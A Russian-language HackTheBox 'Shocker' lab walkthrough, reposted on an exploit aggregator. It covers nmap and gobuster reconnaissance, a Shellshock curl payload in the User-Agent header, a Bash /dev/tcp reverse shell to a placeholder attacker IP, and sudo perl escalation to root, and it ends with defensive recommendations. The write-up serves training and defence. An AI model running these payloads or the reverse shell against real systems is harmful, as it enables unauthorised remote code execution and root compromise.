Sploitus

Exploit for Shocker-TJNULL-OSCP

kitploit Β· 2026-08-23

Exploit Code

MARKDOWN192 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-R3FR4KT-SHOCKER-TJNULL-OSCP-
# HackTheBox: Π Π°Π·Π±ΠΎΡ€ Shocker

Π‘Ρ‚Ρ€ΡƒΠΊΡ‚ΡƒΡ€ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠ΅ ΠΈ ΠΏΡ€ΠΎΡ„Π΅ΡΡΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΠ΅ ΠΏΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅, Π΄Π΅ΠΌΠΎΠ½ΡΡ‚Ρ€ΠΈΡ€ΡƒΡŽΡ‰Π΅Π΅ выявлСниС ΠΈ Ρ€ΡƒΡ‡Π½ΡƒΡŽ ΡΠΊΡΠΏΠ»ΡƒΠ°Ρ‚Π°Ρ†ΠΈΡŽ критичСской уязвимости **Shellshock** , с ΠΏΠΎΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΌ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ΠΌ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Ρ‡Π΅Ρ€Π΅Π· Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΡƒΡŽ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡŽ `sudo` Π½Π° Ρ†Π΅Π»Π΅Π²ΠΎΠΌ Linux.

* * *

## ВСхничСский ΠΎΠ±Π·ΠΎΡ€

  * **ЦСлСвая ОБ:** Linux
  * **IP-адрСс:** `10.10.10.56`
  * **Π‘Π»ΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ:** Лёгкая
  * **ΠžΡΠ½ΠΎΠ²Π½Ρ‹Π΅ уязвимости:** Shellshock (CVE-2014-6271) ΠΈ Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½Π°Ρ конфигурация ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ sudo (`/usr/bin/perl`)
  * **ЦСль:** ΠŸΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Π½Π°Ρ‡Π°Π»ΡŒΠ½Ρ‹ΠΉ доступ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Ρ‡Π΅Ρ€Π΅Π· ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΡŽ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… окруТСния CGI ΠΈ ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π΄ΠΎ root.



* * *

## 1\. Π Π°Π·Π²Π΅Π΄ΠΊΠ° ΠΈ рСкогносцировка

ΠžΡ†Π΅Π½ΠΊΠ° начинаСтся с быстрого ΠΏΠΎΠ»Π½ΠΎΠΏΠΎΡ€Ρ‚Π½ΠΎΠ³ΠΎ TCP SYN-сканирования, Π½Π°Ρ†Π΅Π»Π΅Π½Π½ΠΎΠ³ΠΎ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π½Π° ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ ΠΏΠΎΡ€Ρ‚Ρ‹ (`--open`), с пропуском обнаруТСния хостов (`-Pn`) ΠΈ Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΡ DNS (`-n`) для ускорСния сбора ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ.

root@kitploit:~
    
    
    nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56
    
    

### Π¦Π΅Π»Π΅Π²ΠΎΠ΅ ΠΏΡ€ΠΎΡ„ΠΈΠ»ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ сСрвисов ΠΈ уязвимостСй

ΠŸΠ΅Ρ€Π²ΠΈΡ‡Π½Ρ‹ΠΉ ΠΎΠ±Ρ…ΠΎΠ΄ выявляСт Π΄Π²Π° Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹Ρ… сСрвиса. ΠœΡ‹ ΠΏΡ€ΠΎΠ²ΠΎΠ΄ΠΈΠΌ Π²Ρ‚ΠΎΡ€ΠΈΡ‡Π½ΠΎΠ΅ Ρ†Π΅Π»Π΅Π²ΠΎΠ΅ сканированиС для агрСссивного опрСдСлСния вСрсий (`-sCV`) ΠΈ ΠΎΡ†Π΅Π½ΠΊΠΈ уязвимостСй Π½Π° основС скриптов:

root@kitploit:~
    
    
    nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56
    
    

### Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹ сканирования

  * **ΠŸΠΎΡ€Ρ‚ 80:** HTTP (Π²Π΅Π±-сСрвСр Apache)
  * **ΠŸΠΎΡ€Ρ‚ 2222:** SSH (нСстандартный ΠΏΠΎΡ€Ρ‚)



* * *

## 2\. Π€Π°Π·Π·ΠΈΠ½Π³ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ ΠΈ Π²Π΅Π±-Ρ€Π°Π·Π²Π΅Π΄ΠΊΠ°

ΠŸΠ°Ρ€Π°Π»Π»Π΅Π»ΡŒΠ½ΠΎ со сканированиСм уязвимостСй ΠΌΡ‹ запускаСм ΠΏΠΎΠ΄Π±ΠΎΡ€ Π²Π΅Π±-Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ `gobuster` для картографирования скрытых рСсурсов Π½Π° Apache. Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌ стандартный список слов ΠΈΠ· Ρ„Ρ€Π΅ΠΉΠΌΠ²ΠΎΡ€ΠΊΠ° SecLists:

root@kitploit:~
    
    
    gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20
    
    

### ΠšΠ»ΡŽΡ‡Π΅Π²Π°Ρ Π½Π°Ρ…ΠΎΠ΄ΠΊΠ°

ΠŸΡ€ΠΎΡ†Π΅ΡΡ Ρ„Π°Π·Π·ΠΈΠ½Π³Π° ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Π΅Ρ‚ Π½Π΅ΠΈΠ½Π΄Π΅ΠΊΡΠΈΡ€ΠΎΠ²Π°Π½Π½ΡƒΡŽ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ **`/cgi-bin/`**. Π’ ΡƒΡΡ‚Π°Ρ€Π΅Π²ΡˆΠΈΡ… Π²Π΅Π±-развёртываниях сСрвСры Apache ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ Common Gateway Interface (CGI) для выполнСния сСрвСрных скриптов. Учитывая Π½Π°Π·Π²Π°Π½ΠΈΠ΅ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ ΠΈ Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ этой ΠΏΠ°ΠΏΠΊΠΈ, ΠΌΡ‹ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ ΠΈΡ‰Π΅ΠΌ исполняСмыС скрипты (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, `.sh`, `.cgi`), ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ ошибкам ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΠΈ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… окруТСния.

Π”Π°Π»ΡŒΠ½Π΅ΠΉΡˆΠ°Ρ Ρ€Π°Π·Π²Π΅Π΄ΠΊΠ° выявляСт скрипт с ΠΈΠΌΠ΅Π½Π΅ΠΌ `user.sh`, находящийся Π²Π½ΡƒΡ‚Ρ€ΠΈ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ `/cgi-bin/`.

* * *

## 3\. Π Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° эксплойта ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ ΠΏΠ΅Ρ€Π²ΠΎΠ½Π°Ρ‡Π°Π»ΡŒΠ½ΠΎΠ³ΠΎ доступа

### ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Shellshock (PoC)

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ **Shellshock (CVE-2014-6271)** позволяСт Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмы ΠΏΡƒΡ‚Ρ‘ΠΌ внСдрСния врСдоносных ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½ΠΈΠΉ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ Π² Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΊΠΈ HTTP-запросов (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, `User-Agent`), ΠΎΠ±Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°Π΅ΠΌΡ‹Π΅ уязвимыми экзСмплярами Bash.

ΠœΡ‹ создаём Π½Π°ΡΡ‚Ρ€Π°ΠΈΠ²Π°Π΅ΠΌΡƒΡŽ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ `curl` для ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠΈ Π΄ΠΎΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒΡΡ‚Π²Π° ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ (PoC), ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π½ΠΎΠ³ΠΎ для ΠΏΡ€ΠΈΠ½ΡƒΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ `/usr/bin/id` Π½Π° ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠΉ систСмС:

root@kitploit:~
    
    
    curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
    
    

  * **Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚:** Π’Π΅Π±-сСрвСр ΠΎΡ‚Π²Π΅Ρ‡Π°Π΅Ρ‚ Π²Ρ‹Π²ΠΎΠ΄ΠΎΠΌ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ `id`, Ρ‡Ρ‚ΠΎ ΠΏΠΎΠ΄Ρ‚Π²Π΅Ρ€ΠΆΠ΄Π°Π΅Ρ‚ **ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ΅ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π° (RCE) Π±Π΅Π· Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ, ΠΏΠΎΠ΄ΠΎΠ±Π½ΠΎΠ΅ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ**.



### Установка ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΠΉ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ

Π§Ρ‚ΠΎΠ±Ρ‹ пСрСвСсти наш Π²Π΅ΠΊΡ‚ΠΎΡ€ выполнСния Π² ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹ΠΉ сСанс, ΠΌΡ‹ устанавливаСм Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΉ ΡΠ»ΡƒΡˆΠ°Ρ‚Π΅Π»ΡŒ Netcat Π½Π° ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΠ΅ Π°Ρ‚Π°ΠΊΠΈ:

root@kitploit:~
    
    
    nc -lvnp 4444
    
    

Π—Π°Ρ‚Π΅ΠΌ вставляСм строку ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΠΉ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ Bash Π² врСдоносный Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ `User-Agent`, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€ΠΈΠ½ΡƒΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π²Ρ‹Π·Π²Π°Ρ‚ΡŒ ΠΎΠ±Ρ€Π°Ρ‚Π½Ρ‹ΠΉ Π²Ρ‹Π·ΠΎΠ² Ρ‡Π΅Ρ€Π΅Π· TCP:

root@kitploit:~
    
    
    curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/<YOUR_TUN0_IP>/4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
    
    

ПослС ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠ³ΠΎ выполнСния ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅ΠΌ ΡΡ‚Π°Π±ΠΈΠ»ΡŒΠ½ΡƒΡŽ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΡƒ с Π½ΠΈΠ·ΠΊΠΈΠΌΠΈ привилСгиями:

root@kitploit:~
    
    
    $ whoami
    shelly
    
    

* * *

## 4\. Π›ΠΎΠΊΠ°Π»ΡŒΠ½ΠΎΠ΅ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ (LPE)

ИмСя Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½Ρ‹ΠΉ контСкст ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Π² систСмС, ΠΌΡ‹ провСряСм наши Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ ограничСния. ΠœΡ‹ Π·Π°ΠΏΡ€Π°ΡˆΠΈΠ²Π°Π΅ΠΌ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡŽ `sudo`, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΠΏΡ€Π΅Π΄Π΅Π»ΠΈΡ‚ΡŒ, Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½ Π»ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ `shelly` для выполнСния ΠΊΠΎΠΌΠ°Π½Π΄ с ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½Π½Ρ‹ΠΌΠΈ привилСгиями Π±Π΅Π· Π²Π²ΠΎΠ΄Π° пароля:

root@kitploit:~
    
    
    sudo -l
    
    

### Аудит ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ sudo

Π’ Π²Ρ‹Π²ΠΎΠ΄Π΅ обнаруТиваСтся ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π°Ρ запись высокого риска:

root@kitploit:~
    
    
    User shelly may run the following commands on shocker:
        (root) NOPASSWD: /usr/bin/perl
    
    

### Эксплуатация Perl Ρ‡Π΅Ρ€Π΅Π· GTFOBins

ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Ρƒ нас Π΅ΡΡ‚ΡŒ Π½Π΅ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹ΠΉ, Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ доступ ΠΊ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ Π±ΠΈΠ½Π°Ρ€Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π° **`perl`** ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ `root`, ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ Π»Π΅Π³ΠΊΠΎ ΠΎΠ±ΠΎΠΉΡ‚ΠΈ ограничСния Π±ΠΈΠ½Π°Ρ€Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°. Π‘Π²Π΅Ρ€ΡΡΡΡŒ с **GTFOBins** , ΠΌΡ‹ Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ ΠΎΠ±Ρ‘Ρ€Ρ‚ΠΊΡƒ выполнСния, которая ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚ Perl ΠΏΠ΅Ρ€Π΅ΠΉΡ‚ΠΈ Π² Ρ€ΠΎΠ΄Π½ΡƒΡŽ ΡΠΈΡΡ‚Π΅ΠΌΠ½ΡƒΡŽ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΡƒ (`/bin/sh`), сохраняя контСкст ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ выполнСния (`root`):

root@kitploit:~
    
    
    sudo -u root perl -e 'exec "/bin/sh"'
    
    

ΠœΡ‹ Π½Π΅ΠΌΠ΅Π΄Π»Π΅Π½Π½ΠΎ достигаСм ΠΏΠΎΠ»Π½ΠΎΠ³ΠΎ административного контСкста выполнСния:

root@kitploit:~
    
    
    # whoami
    root
    
    

* * *

## 5\. ΠŸΠΎΡΡ‚-эксплуатация ΠΈ сбор Ρ‚Ρ€ΠΎΡ„Π΅Π΅Π²

Π’Π΅ΠΏΠ΅Ρ€ΡŒ, ΠΊΠΎΠ³Π΄Π° установлСн root-доступ, ΠΌΡ‹ ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΠΌ Π² ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΠ΅ домашниС ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ΠΈ для получСния Π΄ΠΎΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒΡΡ‚Π² ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ.

root@kitploit:~
    
    
    # Access User Flag
    cat /home/shelly/user.txt
    
    # Access Root Flag
    cat /root/root.txt
    
    

* * *

## ΠšΠ»ΡŽΡ‡Π΅Π²Ρ‹Π΅ Π²Ρ‹Π²ΠΎΠ΄Ρ‹ ΠΈ Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ ΠΏΠΎ Π·Π°Ρ‰ΠΈΡ‚Π΅

  1. **УстраняйтС уязвимоС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ΅ обСспСчСниС:** Shellshock β€” это ΡƒΡΡ‚Π°Ρ€Π΅Π²ΡˆΠ°Ρ, катастрофичСская ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² GNU Bash. Π£Π±Π΅Π΄ΠΈΡ‚Π΅ΡΡŒ, Ρ‡Ρ‚ΠΎ всС ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Ρ‹ сСрвСра ΠΏΠΎΠ»ΡƒΡ‡Π°ΡŽΡ‚ своСврСмСнныС обновлСния бСзопасности для Π±Π°Π·ΠΎΠ²Ρ‹Ρ… ΡƒΡ‚ΠΈΠ»ΠΈΡ‚.
  2. **Π—Π°Ρ‰ΠΈΡ‰Π°ΠΉΡ‚Π΅ срСду CGI:** Если сцСнарии CGI Π΄ΠΎΠ»ΠΆΠ½Ρ‹ Π±Ρ‹Ρ‚ΡŒ сохранСны, ΡƒΠ±Π΅Π΄ΠΈΡ‚Π΅ΡΡŒ, Ρ‡Ρ‚ΠΎ ΠΎΠ½ΠΈ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Π² ΠΈΠ·ΠΎΠ»ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ…, ΠΈΠ·ΠΎΠ»ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… модСлях выполнСния (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, с использованиСм спСциализированных срСд выполнСния ΠΊΠΎΠ½Ρ‚Π΅ΠΉΠ½Π΅Ρ€ΠΎΠ² ΠΈΠ»ΠΈ срСд chroot) ΠΈ ΠΈΠ·Π±Π΅Π³Π°ΠΉΡ‚Π΅ использования ΡƒΡΡ‚Π°Ρ€Π΅Π²ΡˆΠΈΡ…, уязвимых ΠΎΠ±ΠΎΠ»ΠΎΡ‡Π΅ΠΊ ΠΏΠΎ ΡƒΠΌΠΎΠ»Ρ‡Π°Π½ΠΈΡŽ.
  3. **Π‘ΠΎΠ±Π»ΡŽΠ΄Π°ΠΉΡ‚Π΅ строгий ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏ ΠΌΠΈΠ½ΠΈΠΌΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ:** ΠŸΡ€Π΅Π΄ΠΎΡΡ‚Π°Π²Π»Π΅Π½ΠΈΠ΅ ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹ΠΌ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡΠΌ Π½Π΅ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½ΠΎΠ³ΠΎ доступа ΠΊ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ ΠΌΠΎΡ‰Π½Ρ‹Ρ… встроСнных ΠΈΠ½Ρ‚Π΅Ρ€ΠΏΡ€Π΅Ρ‚Π°Ρ‚ΠΎΡ€ΠΎΠ², Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ `perl`, `python` ΠΈΠ»ΠΈ `bash` Ρ‡Π΅Ρ€Π΅Π· `sudo`, создаёт ΠΌΠ³Π½ΠΎΠ²Π΅Π½Π½Ρ‹Π΅ Π²Π΅ΠΊΡ‚ΠΎΡ€Ρ‹ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ. Доступ Ρ‡Π΅Ρ€Π΅Π· sudo Π΄ΠΎΠ»ΠΆΠ΅Π½ Π±Ρ‹Ρ‚ΡŒ ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½ Π½Π΅ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹ΠΌΠΈ, строго ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΈΡ€ΡƒΠ΅ΠΌΡ‹ΠΌΠΈ административными сцСнариями.



root@kitploit:~